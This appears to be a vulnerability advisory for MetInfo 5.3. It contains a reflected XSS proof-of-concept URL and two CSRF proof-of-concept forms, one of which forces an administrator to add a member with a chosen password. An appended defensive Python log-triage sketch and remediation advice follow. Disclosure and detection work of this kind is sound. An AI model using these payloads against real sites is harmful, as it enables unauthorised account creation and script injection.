XSS

The MetInfo5.3 application is vulnerable to cross-site scripting (XSS). Attackers can inject arbitrary web script or HTML via the class1 parameter or the anyid parameter to admin/index.php.

Vulnerable parameters: class1, anyid

PoC:

http://127.0.0.1/MetInfo5.3/admin/index.php?n=content&c=article_admin&a=doindex&class1=2"><script>alert(111)</script>&lang=cn&anyid=29"><script>alert(111)<%2fscript>

CSRF-1

The MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF). A successful CSRF attack can force the administrator to add a malicious online customer service entry.

PoC:

<html>
  <body>
    <form action="http://127.0.0.1/MetInfo5.3/admin/interface/online/delete.php?anyid=71&lang=cn&class1=" method="POST">
      <input type="hidden" name="allid" value="6&#44;" />
      <input type="hidden" name="action" value="editor" />
      <input type="hidden" name="id" value="6" />
      <input type="hidden" name="no&#95;order&#95;6" value="1" />
      <input type="hidden" name="name&#95;6" value="mm" />
      <input type="hidden" name="qq&#95;6" value="123123" />
      <input type="hidden" name="msn&#95;6" value="" />
      <input type="hidden" name="taobao&#95;6" value="mm123" />
      <input type="hidden" name="alibaba&#95;6" value="mm123" />
      <input type="hidden" name="skype&#95;6" value="" />
      <input type="hidden" name="saveorder" value="ä&#191;&#157;å&#173;&#152;" />
      <input type="hidden" name="action&#95;type" value="del" />
      <input type="hidden" name="allid" value="6&#44;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Screenshots (not reproduced here): before the attack, after the attack, and the display on the home page.

CSRF-2

The MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF). A successful CSRF attack can force the administrator to add a member with a specified username and password.

PoC:

<html>
  <body>
    <form action="http://127.0.0.1/MetInfo5.3/admin/index.php?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave" method="POST">
      <input type="hidden" name="username" value="www" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="groupid" value="1" />
      <input type="hidden" name="valid" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Screenshots (not reproduced here): before the attack and after the attack.
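
A log-triage sketch covering the XSS and both CSRF issues above, added here as an example and not part of the original advisory or of MetInfo's code: it flags non-numeric class1/anyid values on admin URLs, and POSTs to the two CSRF-targeted endpoints whose Referer is not the site itself. The log lines, the host name `cms.example`, and the rule that legitimate ids are empty or decimal are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined format); host names are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /MetInfo5.3/admin/index.php'
    '?n=content&c=article_admin&a=doindex&class1=2&lang=cn&anyid=29 HTTP/1.1"'
    ' 200 5120 "http://cms.example/MetInfo5.3/admin/" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /MetInfo5.3/admin/index.php'
    '?n=content&c=article_admin&a=doindex&class1=2%22%3E%3Cscript%3Ealert(111)'
    '%3C/script%3E&lang=cn&anyid=29%22%3E%3Cscript%3E HTTP/1.1"'
    ' 200 5300 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "POST /MetInfo5.3/admin/index.php'
    '?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave HTTP/1.1"'
    ' 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "POST /MetInfo5.3/admin/index.php'
    '?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave HTTP/1.1"'
    ' 302 0 "http://cms.example/MetInfo5.3/admin/" "Mozilla/5.0"',
]

LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')
ID_PARAMS = ("class1", "anyid")   # parameters named in the advisory
TRUSTED_HOST = "cms.example"      # assumption: the site's own host name

def findings(line):
    """Return a list of alert tags for one access-log line."""
    m = LINE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    if "/admin/" not in url.path:
        return []
    params = dict(parse_qsl(url.query, keep_blank_values=True))  # percent-decodes values
    # Assumption: legitimate ids are empty or decimal, as in the PoCs' benign values.
    alerts = [f"xss-suspect:{p}" for p in ID_PARAMS
              if not re.fullmatch(r"[0-9]*", params.get(p, ""))]
    # State-changing admin requests taken from the two CSRF PoCs.
    state_change = (params.get("a") == "doaddsave"
                    or url.path.endswith("/admin/interface/online/delete.php"))
    if m["method"] == "POST" and state_change:
        # A missing Referer ("-") is flagged too; privacy tools can cause that benignly.
        if urlsplit(m["referer"]).hostname != TRUSTED_HOST:
            alerts.append("csrf-suspect:referer")
    return alerts

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(findings(entry), entry[:60])
```

Referer matching only helps triage after the fact; the fix for the CSRF issues is a per-session anti-CSRF token on these handlers, and for the XSS it is validating and HTML-encoding class1 and anyid before output.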